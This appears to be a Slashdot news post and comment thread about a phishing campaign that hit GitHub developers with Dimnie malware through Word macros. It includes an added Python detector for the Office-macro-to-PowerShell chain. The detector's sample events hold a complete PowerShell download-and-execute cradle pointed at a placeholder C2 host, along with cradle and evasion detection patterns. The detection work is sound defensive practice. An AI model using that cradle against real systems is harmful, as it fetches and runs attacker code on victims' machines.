
GitHub Repository Owners Targeted By Data-Stealing Malware (threatpost.com)

"Phishing emails zeroing in on developers who own Github repositories were infecting victims with malware capable of stealing data through keyloggers and modules that would snag screenshots," writes ThreatPost. An anonymous reader quotes their report: Researchers at Palo Alto Networks this week said that in mid-January, an unknown number of developers were targeted with emails purporting to be job offers. The attachments instead carried malicious .doc files containing an embedded macro. The macro executed a PowerShell command that would grab malware from a command and control site and execute it... [Senior threat researcher Brandon] Levene said it's unknown how widespread the January campaign was or why developers were targeted, but given the vast number of projects hosted on the platform, it would likely be an attractive target for either criminals or nation-state attackers.
Levene said the PowerShell script drops a binary named Dimnie, which has been around since 2014 but before January targeted primarily Russian-speaking targets. Someone who received two different emails said they appeared to be hand-crafted, according to Ars Technica, and referenced data that had changed that same day. They believe this suggests "a focused campaign explicitly targeting targets perceived as 'high return investments,' such as developers (possibly working on popular/open source projects)."
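The chain the summary describes, an Office document's macro spawning PowerShell that fetches a payload from a C2 server and runs it, is what a detection engineer looks for in process-creation telemetry. The following is an added example and not code from the Palo Alto Networks, ThreatPost or Ars Technica reporting: a small Python scorer that flags an Office application spawning a script host, decodes a -EncodedCommand argument (base64 over UTF-16LE) so the encoding does not hide the download cradle, and grades the result by which cradle indicators appear. The event field names mirror Sysmon Event ID 1 but are an assumption, every sample event is constructed, and the C2 host uses the reserved .invalid TLD so nothing here can resolve.

```python
# Added example (not from the original report): flag the Office-macro ->
# PowerShell download-cradle chain in process-creation telemetry.
# Field names (parent_image, image, command_line) mirror Sysmon Event ID 1
# but are an assumption; all sample events below are constructed.
import base64
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe"}

# Strings typical of a PowerShell "download and execute" cradle, plus the
# evasion switches macro droppers usually add.
CRADLE_PATTERNS = {
    "download": re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I),
    "execute":  re.compile(r"invoke-expression|\biex\b|start-process|\bsaps\b", re.I),
    "evasion":  re.compile(r"-nop\b|-noprofile|-w(?:indowstyle)?\s+hidden|"
                           r"-exec(?:utionpolicy)?\s+bypass|-noni\b", re.I),
}
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def basename(path):
    """Last path component, lower-cased, for either separator."""
    return re.split(r"[\\/]", path)[-1].lower()


def decode_encoded_command(command_line):
    """Return the plaintext of a -EncodedCommand argument, or None.
    PowerShell encodes it as base64 over UTF-16LE, not UTF-8."""
    m = ENCODED_ARG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event):
    """Return an alert dict for one process-creation event, or None."""
    parent = basename(event["parent_image"])
    child = basename(event["image"])
    if parent not in OFFICE_PARENTS or child not in SCRIPT_HOSTS:
        return None  # the chain starts with an Office app spawning a script host
    cmdline = event.get("command_line", "")
    decoded = decode_encoded_command(cmdline)
    # Match indicators against the decoded payload too, so -enc cannot hide them.
    haystack = cmdline if decoded is None else cmdline + " " + decoded
    indicators = [name for name, pat in CRADLE_PATTERNS.items() if pat.search(haystack)]
    severity = "high" if {"download", "execute"} <= set(indicators) else "medium"
    return {
        "severity": severity,
        "parent": parent,
        "child": child,
        "indicators": indicators,
        "decoded_command": decoded,
    }


def scan(events):
    """Run score_event over a list of events and return the alerts."""
    return [a for a in (score_event(e) for e in events) if a is not None]


# Constructed sample telemetry (not real captures).
CRADLE_TEXT = "IEX (New-Object Net.WebClient).DownloadString('http://c2.invalid/stage2.ps1')"
SAMPLE_ENCODED = base64.b64encode(CRADLE_TEXT.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    {  # macro dropper, plaintext cradle
        "parent_image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": 'powershell.exe -nop -w hidden -exec bypass -c "' + CRADLE_TEXT + '"',
    },
    {  # the same cradle hidden behind -EncodedCommand
        "parent_image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell.exe -NoP -NonI -W Hidden -Enc " + SAMPLE_ENCODED,
    },
    {  # Office spawning a script host with no cradle indicators: medium
        "parent_image": r"C:\Program Files\Microsoft Office\Office16\EXCEL.EXE",
        "image": r"C:\Windows\System32\cmd.exe",
        "command_line": "cmd.exe /c echo done",
    },
    {  # an admin running PowerShell from Explorer: no alert
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell.exe Get-ChildItem C:\\Users",
    },
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert["severity"], alert["parent"], "->", alert["child"], alert["indicators"])
```

The parent/child pairing is the stable part of the signal: an Office process has no business launching a script host on most developer workstations, so even the "medium" hit with no cradle strings deserves a look, and the string patterns only raise the priority.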

Comments:
  • The attachments instead carried malicious .doc files containing an embedded macro.

    I hope most devs know better than to open a .doc from some stranger on the internet.

    • by Blade ( 1720 )

      Hope away. I'm sure plenty haven't got a clue.

    • I think that it's insane that they have to know it. We are not afraid of opening .txt files, why should something more structured be that different?

      • by Anonymous Coward

        We are not afraid of opening .txt files

        We are not?

      • Re:Devs (Score:5, Insightful)

        by Anonymous Coward on Monday April 03, 2017 @06:48AM (#54163411)

        Many trojans were distributed as resume.txt.exe at one point, so you really did have to be afraid of opening ".txt" files since the Windows default at the time would hide the .exe... unless of course you were one of the people who understood the risk. Is this insane? Well yes... Microsoft should never have hidden the extension by default. The fault is entirely theirs. Just like how the fault is entirely theirs that a .doc file has a built-in control language easily used to contain a malicious payload.

        Simple solution is not to use the programs that execute the malicious code while reading a document, but this falls under 'having to know it' and isn't a good solution for the commons.

        • by AmiMoJo ( 196126 )

          To be fair, most people don't understand file extensions and they are a shitty way of determining the content of the file. The problem is, Microsoft hid them and didn't replace them with anything better.

          I've had one of these phishing emails just now. Had my correct name and address in it. I guess with all the data leakage such things are bound to get and be sold for pennies if you have ever bought anything online. I just wish I had started adding random letters to my address earlier so I could trace the sour

          • To be fair, most people don't understand file extensions

            There is no cure for stupid. I do agree with you that Microsoft has exacerbated it starting with Windows 95 by hiding the file system as much as possible, though.

            and they are a shitty way of determining the content of the file.

            Extensions are a great way to quickly denote the type of a file. They are portable across all file systems and platforms, short and recognizable by convention, and for the most common files generally unique enough. The fact that 'gif' and 'mp3' are commodity terms nowadays speaks to the power of file extensions.

            Don't get me wrong: I'm not saying th

      • by gatkinso ( 15975 )

        As a general rule: I don't open stuff from email, regardless of who sent it.

        • But do you open stuff you get somewhere else? E-mail is just a medium.

        • Re: (Score:2, Insightful)

          by Anonymous Coward

          As a general rule: I don't open stuff from email, regardless of who sent it.

          Yes, that's because you don't have a job.

          Those of us with actual paying jobs don't have the luxury of not opening e-mail attachments.

          • by AHuxley ( 892839 )

            Well, AC, how far up a different network can an attachment be looked at without the infection spreading?
            Perhaps consider any attachments on a safer computer and see what's in the file before it gets to a computer/network that's vital?
            Lots of strange OSes exist, lots of different file systems. Some of them should be able to network and display an attachment.
        • If I have to open an attachment, it goes in a VM with no virtual adapters. If it is a Trojan and craps all over the VM, oh well. I just roll back the snapshot.

      • Re:Devs (Score:5, Insightful)

        by fuzzyfuzzyfungus ( 1223518 ) on Monday April 03, 2017 @07:23AM (#54163503) Journal
        Because one aspect of the 'more structured' is a handy mechanism for executing code on your system if you open it. If text editors habitually executed any shell scripts included in .txt files, we'd be nervous about those as well. Greater complexity is hardly completely safe, since it makes implementation of software capable of opening the file more complex; but that's a comparatively minor difference of degree compared to the difference between file types where automatic execution is a feature and ones where it's a bug.
  • by Gravis Zero ( 934156 ) on Monday April 03, 2017 @07:49AM (#54163585)

    If you're still using Windows after everything Microsoft has done, you clearly like the abuse, so this is just one more thing for you to suffer through.

    • by doom ( 14564 )
      Yes, that's what I was thinking: these are carefully crafted attacks against high-value targets... who are still using Microsoft products?
  • From the link in the article [hackademix.net]:

    From: zayavka@bsme-mos.ru
    Subject: question
    Hey. I found your software is online. Can you write the code for my project? Terms of reference attached below. The price shall discuss, if you can make. Answer please.

    Sorry, that doesn't pass the smell test. It reeks like a phishing attempt. 1) Unsolicited e-mail. 2) Broken English. 3) Request to open attachment. 4) Vague subject. 5) Sketchy e-mail address.

    Zero sympathy for people who fell for this. Nerds should know better.

  • Windows Based GitHub Repository Owners Targeted By Data-Stealing Malware -
    Here, I fixed the title for you.

  • "Phishing emails zeroing in on developers who own Github repositories were infecting victims with malware capable of stealing data through keyloggers and modules that would snag screenshots,"
  • What about LibreOffice? Does it run code in document files/allow them access to the system?

  • Set-ExecutionPolicy AllSigned
